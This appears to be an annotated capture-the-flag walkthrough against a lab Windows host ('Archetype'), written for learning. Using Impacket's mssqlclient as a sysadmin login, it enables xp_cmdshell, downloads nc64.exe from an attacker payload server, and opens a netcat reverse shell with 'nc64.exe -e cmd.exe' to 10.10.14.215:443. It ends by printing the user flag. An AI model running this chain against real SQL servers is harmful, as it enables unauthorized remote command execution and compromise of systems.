MS SQL
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
Password:
* the -windows-auth flag tells mssqlclient to authenticate ARCHETYPE\sql_svc with Windows (NTLM) credentials instead of a SQL Server login
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
#step 1: check whether the current login is a member of the sysadmin server role (needed for the sp_configure changes below)
SQL> SELECT is_srvrolemember('sysadmin');
-
1
* 1 means the login is a sysadmin member (true), 0 means it is not (false)
#step 2: check whether xp_cmdshell command execution is enabled; if not, enable it. The error below confirms the procedure exists but is switched off, not that permission is missing
SQL> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
#step 3: enable xp_cmdshell; because the adversary is logged in as sysadmin they can flip this server-wide setting via sp_configure (impacket's enable_xp_cmdshell helper does the same). The change persists across sessions and is typically recorded in the SQL Server error log, so on an engagement disable it again afterwards (EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;)
SQL> EXEC sp_configure 'show advanced options', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure;
name minimum maximum config_value run_value
--------------------------------- ----------- ---------- ------------ ----------
xp_cmdshell 0 1 0 0
SQL> EXEC sp_configure 'xp_cmdshell', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
#step 4: proceed with enumeration; xp_cmdshell runs commands as the SQL Server service account, which is why whoami below returns archetype\sql_svc
SQL> xp_cmdshell "whoami"
output
-----------------
archetype\sql_svc
NULL
#step 5: establish an interactive remote shell (each xp_cmdshell call runs a single non-interactive command, so stage netcat on the target and have it call back)
SQL> xp_cmdshell "powershell -c pwd"
output
-------------------
NULL
Path
----
C:\Windows\system32
* determine where to put the reverse shell payload - the destination must be a directory the service account can write to; C:\Windows\System32 (the default working directory shown above) is writable only by administrators
- good candidates are:
- C:\Users\{userName}\Downloads
- C:\Users\{userName}\AppData\Local\Temp
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe > Download RAW
* use the Raw download (the blob page itself is HTML, not the binary) and drop the ?source=... tracking suffix; this is a third-party binary, so compare its hash with a copy you trust before dropping it on a target. Place the raw executable in ~/Downloads and serve that directory - port 8080 is unprivileged, so the sudo on the next command is unnecessary; avoid running the file server as root
root@oco:~$ sudo python3 -m http.server 8080
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"
* -c (short for -Command) makes powershell.exe run the given string as a command
* Invoke-WebRequest (alias iwr; also aliased as wget and curl in Windows PowerShell 5.1, though those two aliases were removed in PowerShell 7) downloads the file and -OutFile writes it to disk
* 10.10.14.215:8080 is the attacker's payload server
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
NULL
Directory: C:\Users\sql_svc\Downloads
NULL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 6:58 AM 226042 nc64.exe
root@oco:~$ sudo nc -nlvp 443
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"
* this command starts cmd.exe on the target with its input/output attached (-e) to the uploaded nc64.exe, which connects out to the attacker's listener; the session runs as sql_svc and is plaintext, so everything typed or returned is visible on the wire
* 10.10.14.215 is the attacker's IP where a netcat listener is active on port 443; 443 is chosen because outbound HTTPS traffic is rarely blocked by egress filtering
root@oco:~$ sudo nc -nlvp 443    (output of the listener started above)
listening on [any] 443 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads> dir ..\Desktop
dir ..\Desktop
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop
01/20/2020 05:42 AM <DIR> .
01/20/2020 05:42 AM <DIR> ..
02/25/2020 06:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,720,813,056 bytes free
C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
type ..\Desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3